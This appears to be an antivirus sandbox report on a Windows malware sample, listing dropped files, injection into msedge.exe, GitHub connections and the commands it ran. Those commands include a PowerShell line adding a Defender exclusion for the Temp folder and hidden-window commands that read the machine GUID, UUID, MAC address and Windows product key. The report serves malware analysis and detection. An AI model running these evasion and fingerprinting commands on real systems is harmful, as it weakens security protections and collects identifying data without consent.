Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'"
Launches a large number of processes
Injects code into
the following user processes:
- msedge.exe
Modifies file system
Creates the following files
- %TEMP%\adsfqewr_72o7x70nlu2.ps1
- %TEMP%\pcc8dwcyyl.ps1
- %TEMP%\u5fcfvt2\u5fcfvt2.0.cs
- %TEMP%\u5fcfvt2\u5fcfvt2.cmdline
- %TEMP%\u5fcfvt2\u5fcfvt2.out
- %TEMP%\u5fcfvt2\csc2cef772b858b41cd847ce39623e09ded.tmp
- %TEMP%\res6405.tmp
- %TEMP%\u5fcfvt2\u5fcfvt2.dll
- nul
- %TEMP%\d1ge\sql-wasm.wasm
- %TEMP%\d1ge\shellmanager.exe
- %TEMP%\d1ge\launcher.exe
Deletes the following files
- %TEMP%\pcc8dwcyyl.ps1
Network activity
Connects to
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
TCP
Other
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
UDP
- DNS ASK gi##ub.com
- DNS ASK re#########ets.githubusercontent.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%TEMP%\PCc8dWcYYl.ps1"
- '%TEMP%\d1ge\launcher.exe' --doge
- '%TEMP%\d1ge\shellmanager.exe'
Executes the following
- '<SYSTEM32>\cmd.exe' /d /s /c "<SYSTEM32>\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid"
- '<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
- '<SYSTEM32>\cmd.exe' /d /s /c "tasklist"
- '<SYSTEM32>\tasklist.exe'
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell "try { (Get-Process -Id 4276).Path } catch { '' }""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "try { (Get-Process -Id 4276).Path } catch { '' }"
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "%TEMP%\PCc8dWcYYl.ps1""
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\u5fcfvt2\u5fcfvt2.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6405.tmp" "%TEMP%\u5fcfvt2\CSC2CEF772B858B41CD847CE39623E09DED.TMP"
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'""
- '<SYSTEM32>\cmd.exe' /d /s /c "tasklist /FI "IMAGENAME eq ShellManager.exe" /FO CSV /NH"
- '<SYSTEM32>\tasklist.exe' /FI "IMAGENAME eq ShellManager.exe" /FO CSV /NH
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object -ExpandProperty Name""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Disk\Enum" -Name "0" | Select-Object -ExpandProperty "0"""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object CurrentHorizontalResolution, CurrentVerticalResolution | ConvertTo-J...
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -ExpandProperty TotalPhysicalMemory""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "http://ip-api.com/line/?fields=hosting" -UseBasicParsing).Content""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductK...
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, OSArchitecture | ConvertTo-Json""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing).Content""
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-NetAdapter | Where-Object {$_.Status -eq 2} | Select-Object -ExpandProperty MacAddress""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object CurrentHorizontalResolution, CurrentVerticalResolution | ConvertTo-Json"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Disk\Enum" -Name "0" | Select-Object -ExpandProperty "0""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object -ExpandProperty Name"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -ExpandProperty TotalPhysicalMemory"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "http://ip-api.com/line/?fields=hosting" -UseBasicParsing).Content"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, OSArchitecture | ConvertTo-Json"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing).Content"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -Command "Get-NetAdapter | Where-Object {$_.Status -eq 2} | Select-Object -ExpandProperty MacAddress"
- '<SYSTEM32>\cmd.exe' /d /s /c "<SYSTEM32>\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "tasklist"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell "try { (Get-Process -Id 4276).Path } catch { '' }""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "%TEMP%\PCc8dWcYYl.ps1""' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\u5fcfvt2\u5fcfvt2.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6405.tmp" "%TEMP%\u5fcfvt2\CSC2CEF772B858B41CD847CE39623E09DED.TMP"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'""' (with hidden window)
- '%TEMP%\d1ge\launcher.exe' --doge' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "tasklist /FI "IMAGENAME eq ShellManager.exe" /FO CSV /NH"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object -ExpandProperty Name""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Disk\Enum" -Name "0" | Select-Object -ExpandProperty "0"""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_VideoController | Select-Object CurrentHorizontalResolution, CurrentVerticalResolution | ConvertTo-J...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -ExpandProperty TotalPhysicalMemory""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "http://ip-api.com/line/?fields=hosting" -UseBasicParsing).Content""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductK...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, OSArchitecture | ConvertTo-Json""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "(Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing).Content""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -Command "Get-NetAdapter | Where-Object {$_.Status -eq 2} | Select-Object -ExpandProperty MacAddress""' (with hidden window)
